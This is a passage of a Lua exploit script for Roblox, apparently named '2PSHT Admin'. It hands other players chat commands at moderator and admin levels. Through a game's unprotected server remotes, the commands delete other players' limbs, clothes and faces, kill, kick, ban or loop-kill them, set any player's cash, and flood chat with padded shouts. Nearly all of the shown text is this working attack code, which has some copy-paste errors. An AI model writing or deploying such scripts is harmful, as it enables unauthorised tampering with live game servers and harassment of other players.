  781. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  782. else
  783. end
  784. end
  785. end
  786. end)
  787.  
  788. Command12 = playersService[v].Chatted:Connect(function(msg)
  789. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."faceless " then
  790. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  791. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  792. end
  793. end
  794. end)
  795.  
  796. Command13 = playersService[v].Chatted:Connect(function(msg)
  797. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rface " then
  798. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  799. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  800. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  801. end
  802. end
  803. end
  804. end)
  805.  
  806. Command14 = playersService[v].Chatted:Connect(function(msg)
  807. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removeface " then
  808. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  809. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  810. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  811. end
  812. end
  813. end
  814. end)
  815.  
  816. Command15 = playersService[v].Chatted:Connect(function(msg)
  817. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rhats " then
  818. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  819. for x,o in pairs(playersService[v].Character:GetChildren()) do
  820. if o:IsA("Accessory") then
  821. replicatedStorage.events.destroyObject:FireServer(o)
  822. end
  823. end
  824. end
  825. end
  826. end)
  827.  
  828. Command16 = playersService[v].Chatted:Connect(function(msg)
  829. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removehats " then
  830. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  831. for x,o in pairs(playersService[v].Character:GetChildren()) do
  832. if o:IsA("Accessory") then
  833. replicatedStorage.events.destroyObject:FireServer(o)
  834. end
  835. end
  836. end
  837. end
  838. end)
  839.  
  840. Command17 = playersService[v].Chatted:Connect(function(msg)
  841. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."creeper " then
  842. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  843. if playersService[v].Character.Head:FindFirstChild("Mesh") then
  844. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head.Mesh)
  845. end
  846. if playersService[v].Character:FindFirstChild("Left Arm") then
  847. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  848. end
  849. if playersService[v].Character:FindFirstChild("Right Arm") then
  850. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  851. end
  852. end
  853. end
  854. end)
  855.  
  856. Command18 = playersService[v].Chatted:Connect(function(msg)
  857. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."toolban " then
  858. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  859. table.insert(toolbanned,playersService[v].Name)
  860. end
  861. end
  862. end)
  863.  
  864. Command19 = playersService[v].Chatted:Connect(function(msg)
  865. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."untoolban " then
  866. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  867. for j,k in pairs(toolbanned) do
  868. if string.match(k,v) then
  869. table.remove(toolbanned,j)
  870. end
  871. end
  872. end
  873. end
  874. end)
  875.  
  876. end
  877. end
  878. end
  879. end)
  880.  
  881. createCommand:Connect(function(msg)
  882. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."unmod " then
  883. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  884. for j,k in pairs(moderators) do
  885. if string.match(k,v) then
  886. table.remove(moderators,j)
  887. for _=1,19 do
  888. Command1:Disconnect()
  889. Command2:Disconnect()
  890. Command3:Disconnect()
  891. Command4:Disconnect()
  892. Command5:Disconnect()
  893. Command6:Disconnect()
  894. Command7:Disconnect()
  895. Command8:Disconnect()
  896. Command9:Disconnect()
  897. Command10:Disconnect()
  898. Command11:Disconnect()
  899. Command12:Disconnect()
  900. Command13:Disconnect()
  901. Command14:Disconnect()
  902. Command15:Disconnect()
  903. Command16:Disconnect()
  904. Command17:Disconnect()
  905. Command18:Disconnect()
  906. Command19:Disconnect()
  907. end
  908. end
  909. end
  910. end
  911. end
  912. end)
  913.  
  914. createCommand:Connect(function(msg)
  915. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."moderator " then
  916. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  917. if playersService:FindFirstChild(v) then
  918. table.insert(moderators,playersService[v].Name)
  919. Uctron.SoundFX._notification1:Play()
  920. starterGui:SetCore("SendNotification", {
  921. Title = "2PSHT Admin | Success";
  922. Text = "Moderator powers given to \""..v.."\".";
  923. Icon = "rbxassetid://4595715410";
  924. Duration = 15;
  925. Button1 = "Okay";
  926. })
  927. game.Players[v].Chatted:Connect(function(msg)
  928. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kill " then
  929. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  930. if playersService[v].Character.Torso:FindFirstChild("Neck") then
  931. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Torso.Neck)
  932. end
  933. runService.RenderStepped:Wait()
  934. end
  935. end
  936. end)
  937.  
  938. Command20 = playersService[v].Chatted:Connect(function(msg)
  939. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kill " then
  940. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  941. if playersService[v].Character.Torso:FindFirstChild("Neck") then
  942. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Torso.Neck)
  943. end
  944. runService.RenderStepped:Wait()
  945. end
  946. end
  947. end)
  948.  
  949. Command21 = playersService[v].Chatted:Connect(function(msg)
  950. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."cash " then
  951. for i,v in pairs(GetPlayer(string.split(msg, " ")[2])) do
  952. b = string.split(msg, " ")[3]
  953. game:GetService("ReplicatedStorage").Events.changeValue:InvokeServer(game:GetService('ReplicatedStorage').plrData[v].cash, b)
  954. end
  955. end
  956. end)
  957.  
  958. Command22 = playersService[v].Chatted:Connect(function(msg)
  959. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."unpackage " then
  960. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  961. for x,o in pairs(playersService[v].Character:GetChildren()) do
  962. if o:IsA("CharacterMesh") then
  963. replicatedStorage.events.destroyObject:FireServer(o)
  964. end
  965. end
  966. end
  967. end
  968. end)
  969.  
  970. Command23 = playersService[v].Chatted:Connect(function(msg)
  971. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."rlimbs " then
  972. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  973. if playersService[v].Character:FindFirstChild("Left Arm") then
  974. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  975. end
  976. if playersService[v].Character:FindFirstChild("Right Arm") then
  977. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  978. end
  979. if playersService[v].Character:FindFirstChild("Left Leg") then
  980. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  981. end
  982. if playersService[v].Character:FindFirstChild("Right Leg") then
  983. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  984. end
  985. end
  986. end
  987. end)
  988.  
  989. Command24 = playersService[v].Chatted:Connect(function(msg)
  990. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."removelimbs " then
  991. for i,v in pairs(GetPlayer(string.sub(msg,13+Prefix:len()))) do
  992. if playersService[v].Character:FindFirstChild("Left Arm") then
  993. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  994. end
  995. if playersService[v].Character:FindFirstChild("Right Arm") then
  996. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  997. end
  998. if playersService[v].Character:FindFirstChild("Left Leg") then
  999. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1000. end
  1001. if playersService[v].Character:FindFirstChild("Right Leg") then
  1002. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1003. end
  1004. end
  1005. end
  1006. end)
  1007.  
  1008. Command25 = playersService[v].Chatted:Connect(function(msg)
  1009. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rarms " then
  1010. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1011. if playersService[v].Character:FindFirstChild("Left Arm") then
  1012. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1013. end
  1014. if playersService[v].Character:FindFirstChild("Left Arm") then
  1015. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1016. end
  1017. end
  1018. end
  1019. end)
  1020.  
  1021. Command26 = playersService[v].Chatted:Connect(function(msg)
  1022. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removearms " then
  1023. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1024. if playersService[v].Character:FindFirstChild("Left Arm") then
  1025. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1026. end
  1027. if playersService[v].Character:FindFirstChild("Left Arm") then
  1028. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1029. end
  1030. end
  1031. end
  1032. end)
  1033.  
  1034. Command27 = playersService[v].Chatted:Connect(function(msg)
  1035. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rlegs " then
  1036. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1037. if playersService[v].Character:FindFirstChild("Left Leg") then
  1038. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1039. end
  1040. if playersService[v].Character:FindFirstChild("Right Leg") then
  1041. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1042. end
  1043. end
  1044. end
  1045. end)
  1046.  
  1047. Command28 = playersService[v].Chatted:Connect(function(msg)
  1048. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removelegs " then
  1049. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1050. if playersService[v].Character:FindFirstChild("Left Leg") then
  1051. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1052. end
  1053. if playersService[v].Character:FindFirstChild("Right Leg") then
  1054. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1055. end
  1056. end
  1057. end
  1058. end)
  1059.  
  1060. Command29 = playersService[v].Chatted:Connect(function(msg)
  1061. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."naked " then
  1062. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1063. if playersService[v].Character:FindFirstChild("Shirt") then
  1064. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  1065. else
  1066. end
  1067. if playersService[v].Character:FindFirstChild("Pants") then
  1068. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  1069. else
  1070. end
  1071. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  1072. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  1073. else
  1074. end
  1075. end
  1076. end
  1077. end)
  1078.  
  1079. Command30 = playersService[v].Chatted:Connect(function(msg)
  1080. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."nayked " then
  1081. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  1082. if playersService[v].Character:FindFirstChild("Shirt") then
  1083. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  1084. else
  1085. end
  1086. if playersService[v].Character:FindFirstChild("Pants") then
  1087. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  1088. else
  1089. end
  1090. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  1091. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  1092. else
  1093. end
  1094. end
  1095. end
  1096. end)
  1097.  
  1098. Command31 = playersService[v].Chatted:Connect(function(msg)
  1099. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."faceless " then
  1100. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  1101. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1102. end
  1103. end
  1104. end)
  1105.  
  1106. Command32 = playersService[v].Chatted:Connect(function(msg)
  1107. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rface " then
  1108. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1109. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  1110. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1111. end
  1112. end
  1113. end
  1114. end)
  1115.  
  1116. Command33 = playersService[v].Chatted:Connect(function(msg)
  1117. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removeface " then
  1118. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1119. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  1120. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1121. end
  1122. end
  1123. end
  1124. end)
  1125.  
  1126. Command34 = playersService[v].Chatted:Connect(function(msg)
  1127. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rhats " then
  1128. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1129. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1130. if o:IsA("Accessory") then
  1131. replicatedStorage.events.destroyObject:FireServer(o)
  1132. end
  1133. end
  1134. end
  1135. end
  1136. end)
  1137.  
  1138. Command35 = playersService[v].Chatted:Connect(function(msg)
  1139. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removehats " then
  1140. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1141. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1142. if o:IsA("Accessory") then
  1143. replicatedStorage.events.destroyObject:FireServer(o)
  1144. end
  1145. end
  1146. end
  1147. end
  1148. end)
  1149.  
  1150. Command36 = playersService[v].Chatted:Connect(function(msg)
  1151. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."creeper " then
  1152. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1153. if playersService[v].Character.Head:FindFirstChild("Mesh") then
  1154. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head.Mesh)
  1155. end
  1156. if playersService[v].Character:FindFirstChild("Left Arm") then
  1157. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1158. end
  1159. if playersService[v].Character:FindFirstChild("Right Arm") then
  1160. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1161. end
  1162. end
  1163. end
  1164. end)
  1165.  
  1166. Command37 = playersService[v].Chatted:Connect(function(msg)
  1167. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."toolban " then
  1168. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1169. table.insert(toolbanned,playersService[v].Name)
  1170. end
  1171. end
  1172. end)
  1173.  
  1174. Command38 = playersService[v].Chatted:Connect(function(msg)
  1175. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."untoolban " then
  1176. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  1177. for j,k in pairs(toolbanned) do
  1178. if string.match(k,v) then
  1179. table.remove(toolbanned,j)
  1180. end
  1181. end
  1182. end
  1183. end
  1184. end)
  1185.  
  1186. end
  1187. end
  1188. end
  1189. end)
  1190.  
  1191. createCommand:Connect(function(msg)
  1192. if msg:lower():sub(1,13+Prefix:len()) == Prefix.."unmoderator " then
  1193. for i,v in pairs(GetPlayer(string.sub(msg,14+Prefix:len()))) do
  1194. for j,k in pairs(moderators) do
  1195. if string.match(k,v) then
  1196. table.remove(moderators,j)
  1197. Command20:Disconnect()
  1198. Command21:Disconnect()
  1199. Command32:Disconnect()
  1200. Command23:Disconnect()
  1201. Command24:Disconnect()
  1202. Command25:Disconnect()
  1203. Command26:Disconnect()
  1204. Command27:Disconnect()
  1205. Command28:Disconnect()
  1206. Command29:Disconnect()
  1207. Command30:Disconnect()
  1208. Command31:Disconnect()
  1209. Command32:Disconnect()
  1210. Command33:Disconnect()
  1211. Command34:Disconnect()
  1212. Command35:Disconnect()
  1213. Command36:Disconnect()
  1214. Command37:Disconnect()
  1215. Command38:Disconnect()
  1216. end
  1217. end
  1218. end
  1219. end
  1220. end)
  1221.  
  1222. createCommand:Connect(function(msg)
  1223. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."admin " then
  1224. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1225. if playersService:FindFirstChild(v) then
  1226. table.insert(administrators,playersService[v].Name)
  1227. Uctron.SoundFX._notification1:Play()
  1228. starterGui:SetCore("SendNotification", {
  1229. Title = "2PSHT Admin | Success";
  1230. Text = "Administrator powers given to \""..v.."\".";
  1231. Icon = "rbxassetid://4595715410";
  1232. Duration = 15;
  1233. Button1 = "Okay";
  1234. })
  1235. Command39 = playersService[v].Chatted:Connect(function(msg)
  1236. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."punish " then
  1237. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  1238. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character)
  1239. end
  1240. end
  1241. end)
  1242.  
  1243. Command40 = playersService[v].Chatted:Connect(function(msg)
  1244. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."ragdoll " then
  1245. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  1246. if playersService[v].Character:FindFirstChild("Humanoid") then
  1247. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Humanoid)
  1248. end
  1249. end
  1250. end
  1251. end)
  1252.  
  1253. Command41 = playersService[v].Chatted:Connect(function(msg)
  1254. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kick " then
  1255. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  1256. if playersService:FindFirstChild(v) then
  1257. replicatedStorage.events.destroyObject:FireServer(playersService[v])
  1258. end
  1259. end
  1260. end
  1261. end)
  1262.  
  1263. Command42 = playersService[v].Chatted:Connect(function(msg)
  1264. if msg:lower():sub(1,4+Prefix:len()) == Prefix.."ban " then
  1265. for i,v in pairs(GetPlayer(string.sub(msg,5+Prefix:len()))) do
  1266. table.insert(banned,playersService[v].Name)
  1267. end
  1268. end
  1269. end)
  1270.  
  1271. Command43 = playersService[v].Chatted:Connect(function(msg)
  1272. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."unban " then
  1273. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1274. for j,k in pairs(banned) do
  1275. if string.match(k,v) then
  1276. table.remove(banned,j)
  1277. end
  1278. end
  1279. end
  1280. end
  1281. end)
  1282.  
  1283. Command44 = playersService[v].Chatted:Connect(function(msg)
  1284. if msg:lower():sub(1,3+Prefix:len()) == Prefix.."cm " then
  1285. local ChatMessage = msg:sub(4+Prefix:len(), #msg)
  1286. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  1287. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  1288. end
  1289. end)
  1290.  
  1291. Command45 = playersService[v].Chatted:Connect(function(msg)
  1292. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."cmessage " then
  1293. local ChatMessage = msg:sub(10+Prefix:len(), #msg)
  1294. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  1295. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  1296. end
  1297. end)
  1298.  
  1299. Command46 = playersService[v].Chatted:Connect(function(msg)
  1300. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."chatmessage " then
  1301. local ChatMessage = msg:sub(13+Prefix:len(), #msg)
  1302. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  1303. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  1304. end
  1305. end)
  1306.  
  1307. Command47 = playersService[v].Chatted:Connect(function(msg)
  1308. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."loopkill " then
  1309. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  1310. table.insert(loopkilled,playersService[v].Name)
  1311. end
  1312. end
  1313. end)
  1314.  
  1315. Command48 = playersService[v].Chatted:Connect(function(msg)
  1316. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."unloopkill " then
  1317. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1318. for j,k in pairs(loopkilled) do
  1319. if string.match(k,v) then
  1320. table.remove(loopkilled,j)
  1321. end
  1322. end
  1323. end
  1324. end
  1325. end)
  1326.  
  1327. Command49 = playersService[v].Chatted:Connect(function(msg)
  1328. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kill " then
  1329. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  1330. if playersService[v].Character.Torso:FindFirstChild("Neck") then
  1331. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Torso.Neck)
  1332. end
  1333. runService.RenderStepped:Wait()
  1334. end
  1335. end
  1336. end)
  1337.  
  1338. Command50 = playersService[v].Chatted:Connect(function(msg)
  1339. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."cash " then
  1340. for i,v in pairs(GetPlayer(string.split(msg, " ")[2])) do
  1341. b = string.split(msg, " ")[3]
  1342. game:GetService("ReplicatedStorage").Events.changeValue:InvokeServer(game:GetService('ReplicatedStorage').plrData[v].cash, b)
  1343. end
  1344. end
  1345. end)
  1346.  
  1347. Command51 = playersService[v].Chatted:Connect(function(msg)
  1348. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."unpackage " then
  1349. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  1350. for x,o in pairs(playersService[v].Character:GetChildren()) do
  1351. if o:IsA("CharacterMesh") then
  1352. replicatedStorage.events.destroyObject:FireServer(o)
  1353. end
  1354. end
  1355. end
  1356. end
  1357. end)
  1358.  
  1359. Command52 = playersService[v].Chatted:Connect(function(msg)
  1360. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."rlimbs " then
  1361. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  1362. if playersService[v].Character:FindFirstChild("Left Arm") then
  1363. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1364. end
  1365. if playersService[v].Character:FindFirstChild("Right Arm") then
  1366. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1367. end
  1368. if playersService[v].Character:FindFirstChild("Left Leg") then
  1369. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1370. end
  1371. if playersService[v].Character:FindFirstChild("Right Leg") then
  1372. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1373. end
  1374. end
  1375. end
  1376. end)
  1377.  
  1378. Command53 = playersService[v].Chatted:Connect(function(msg)
  1379. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."removelimbs " then
  1380. for i,v in pairs(GetPlayer(string.sub(msg,13+Prefix:len()))) do
  1381. if playersService[v].Character:FindFirstChild("Left Arm") then
  1382. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1383. end
  1384. if playersService[v].Character:FindFirstChild("Right Arm") then
  1385. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1386. end
  1387. if playersService[v].Character:FindFirstChild("Left Leg") then
  1388. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1389. end
  1390. if playersService[v].Character:FindFirstChild("Right Leg") then
  1391. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1392. end
  1393. end
  1394. end
  1395. end)
  1396.  
  1397. Command54 = playersService[v].Chatted:Connect(function(msg)
  1398. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rarms " then
  1399. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1400. if playersService[v].Character:FindFirstChild("Left Arm") then
  1401. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1402. end
  1403. if playersService[v].Character:FindFirstChild("Left Arm") then
  1404. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1405. end
  1406. end
  1407. end
  1408. end)
  1409.  
  1410. Command55 = playersService[v].Chatted:Connect(function(msg)
  1411. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removearms " then
  1412. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1413. if playersService[v].Character:FindFirstChild("Left Arm") then
  1414. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  1415. end
  1416. if playersService[v].Character:FindFirstChild("Left Arm") then
  1417. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  1418. end
  1419. end
  1420. end
  1421. end)
  1422.  
  1423. Command56 = playersService[v].Chatted:Connect(function(msg)
  1424. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rlegs " then
  1425. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1426. if playersService[v].Character:FindFirstChild("Left Leg") then
  1427. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1428. end
  1429. if playersService[v].Character:FindFirstChild("Right Leg") then
  1430. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1431. end
  1432. end
  1433. end
  1434. end)
  1435.  
  1436. Command57 = playersService[v].Chatted:Connect(function(msg)
  1437. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removelegs " then
  1438. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1439. if playersService[v].Character:FindFirstChild("Left Leg") then
  1440. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  1441. end
  1442. if playersService[v].Character:FindFirstChild("Right Leg") then
  1443. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  1444. end
  1445. end
  1446. end
  1447. end)
  1448.  
  1449. Command58 = playersService[v].Chatted:Connect(function(msg)
  1450. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."naked " then
  1451. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1452. if playersService[v].Character:FindFirstChild("Shirt") then
  1453. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  1454. else
  1455. end
  1456. if playersService[v].Character:FindFirstChild("Pants") then
  1457. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  1458. else
  1459. end
  1460. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  1461. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  1462. else
  1463. end
  1464. end
  1465. end
  1466. end)
  1467.  
  1468. Command59 = playersService[v].Chatted:Connect(function(msg)
  1469. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."nayked " then
  1470. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  1471. if playersService[v].Character:FindFirstChild("Shirt") then
  1472. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  1473. else
  1474. end
  1475. if playersService[v].Character:FindFirstChild("Pants") then
  1476. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  1477. else
  1478. end
  1479. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  1480. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  1481. else
  1482. end
  1483. end
  1484. end
  1485. end)
  1486.  
  1487. Command60 = playersService[v].Chatted:Connect(function(msg)
  1488. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."faceless " then
  1489. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  1490. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1491. end
  1492. end
  1493. end)
  1494.  
  1495. Command61 = playersService[v].Chatted:Connect(function(msg)
  1496. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rface " then
  1497. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  1498. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  1499. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1500. end
  1501. end
  1502. end
  1503. end)
  1504.  
  1505. Command62 = playersService[v].Chatted:Connect(function(msg)
  1506. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removeface " then
  1507. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  1508. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  1509. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  1510. end
  1511. end
  1512. end
  1513. end)
  1514.  
